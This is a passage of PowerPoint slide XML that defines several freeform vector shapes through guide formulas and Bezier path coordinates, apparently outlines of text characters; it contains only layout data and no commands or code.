                <a:gd name="T12" fmla="*/ 9 w 206"/>
                <a:gd name="T13" fmla="*/ 140 h 249"/>
                <a:gd name="T14" fmla="*/ 175 w 206"/>
                <a:gd name="T15" fmla="*/ 244 h 249"/>
                <a:gd name="T16" fmla="*/ 188 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 249"/>
                <a:gd name="T18" fmla="*/ 206 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 194 w 206"/>
                <a:gd name="T21" fmla="*/ 215 h 249"/>
                <a:gd name="T22" fmla="*/ 51 w 206"/>
                <a:gd name="T23" fmla="*/ 125 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 206"/>
                <a:gd name="T25" fmla="*/ 3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49">
                  <a:moveTo>
                    <a:pt x="194" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="206" y="27"/>
                    <a:pt x="206" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="188" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="0"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="175" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="111"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="137"/>
                    <a:pt x="9" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175" y="244"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="249"/>
                    <a:pt x="184" y="249"/>
                    <a:pt x="188" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="249"/>
                    <a:pt x="206" y="243"/>
                    <a:pt x="206" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="222"/>
                    <a:pt x="199" y="218"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="3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1" name="Freeform 102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B229E604-D8D9-4DB1-8F21-991261C51471}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2644776" y="2541588"/>
              <a:ext cx="103188" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 243"/>
                <a:gd name="T1" fmla="*/ 31 h 309"/>
                <a:gd name="T2" fmla="*/ 243 w 243"/>
                <a:gd name="T3" fmla="*/ 15 h 309"/>
                <a:gd name="T4" fmla="*/ 223 w 243"/>
                <a:gd name="T5" fmla="*/ 0 h 309"/>
                <a:gd name="T6" fmla="*/ 172 w 243"/>
                <a:gd name="T7" fmla="*/ 0 h 309"/>
                <a:gd name="T8" fmla="*/ 152 w 243"/>
                <a:gd name="T9" fmla="*/ 15 h 309"/>
                <a:gd name="T10" fmla="*/ 179 w 243"/>
                <a:gd name="T11" fmla="*/ 31 h 309"/>
                <a:gd name="T12" fmla="*/ 141 w 243"/>
                <a:gd name="T13" fmla="*/ 184 h 309"/>
                <a:gd name="T14" fmla="*/ 122 w 243"/>
                <a:gd name="T15" fmla="*/ 269 h 309"/>
                <a:gd name="T16" fmla="*/ 121 w 243"/>
                <a:gd name="T17" fmla="*/ 269 h 309"/>
                <a:gd name="T18" fmla="*/ 112 w 243"/>
                <a:gd name="T19" fmla="*/ 225 h 309"/>
                <a:gd name="T20" fmla="*/ 64 w 243"/>
                <a:gd name="T21" fmla="*/ 31 h 309"/>
                <a:gd name="T22" fmla="*/ 92 w 243"/>
                <a:gd name="T23" fmla="*/ 15 h 309"/>
                <a:gd name="T24" fmla="*/ 71 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 309"/>
                <a:gd name="T26" fmla="*/ 20 w 243"/>
                <a:gd name="T27" fmla="*/ 0 h 309"/>
                <a:gd name="T28" fmla="*/ 0 w 243"/>
                <a:gd name="T29" fmla="*/ 15 h 309"/>
                <a:gd name="T30" fmla="*/ 28 w 243"/>
                <a:gd name="T31" fmla="*/ 31 h 309"/>
                <a:gd name="T32" fmla="*/ 94 w 243"/>
                <a:gd name="T33" fmla="*/ 290 h 309"/>
                <a:gd name="T34" fmla="*/ 122 w 243"/>
                <a:gd name="T35" fmla="*/ 309 h 309"/>
                <a:gd name="T36" fmla="*/ 149 w 243"/>
                <a:gd name="T37" fmla="*/ 291 h 309"/>
                <a:gd name="T38" fmla="*/ 215 w 243"/>
                <a:gd name="T39" fmla="*/ 3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309">
                  <a:moveTo>
                    <a:pt x="215" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="31"/>
                    <a:pt x="243" y="31"/>
                    <a:pt x="243" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="0"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="223" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="0"/>
                    <a:pt x="152" y="0"/>
                    <a:pt x="152" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="31"/>
                    <a:pt x="162" y="31"/>
                    <a:pt x="179" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141" y="184"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="210"/>
                    <a:pt x="125" y="248"/>
                    <a:pt x="122" y="269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="121" y="269"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="252"/>
                    <a:pt x="117" y="243"/>
                    <a:pt x="112" y="225"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="31"/>
                    <a:pt x="92" y="31"/>
                    <a:pt x="92" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="0"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="71" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="10" y="31"/>
                    <a:pt x="28" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="309"/>
                    <a:pt x="107" y="309"/>
                    <a:pt x="122" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="309"/>
                    <a:pt x="145" y="309"/>
                    <a:pt x="149" y="291"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215" y="3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2" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D6868E-6ABC-40BA-9B69-76CB2C3325A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2768601" y="2541588"/>
              <a:ext cx="79375" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 116 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 96 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 116 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 116 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 116 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 116 w 188"/>
                <a:gd name="T39" fmla="*/ 2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6" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="95"/>
                    <a:pt x="113" y="90"/>
                    <a:pt x="96" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="11"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="50"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116"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3" name="Freeform 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E23E237-153B-4B97-80EA-2308E57B1F28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2870201" y="2579688"/>
              <a:ext cx="95250" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="193" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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4" name="Freeform 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3E7391-A9AC-4345-8DD7-FBCE4A77405C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2979739" y="2554288"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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5" name="Freeform 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0A2CC82-BF8F-4C92-9EC1-7843E4E234D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3087689" y="2581275"/>
              <a:ext cx="104775" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 193 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 151 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 173 w 249"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 173 w 249"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 249"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 21 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 173 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="173" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="184" y="215"/>
                    <a:pt x="193" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="215"/>
                    <a:pt x="249" y="215"/>
                    <a:pt x="249" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="185"/>
                    <a:pt x="236" y="185"/>
                    <a:pt x="229" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="137"/>
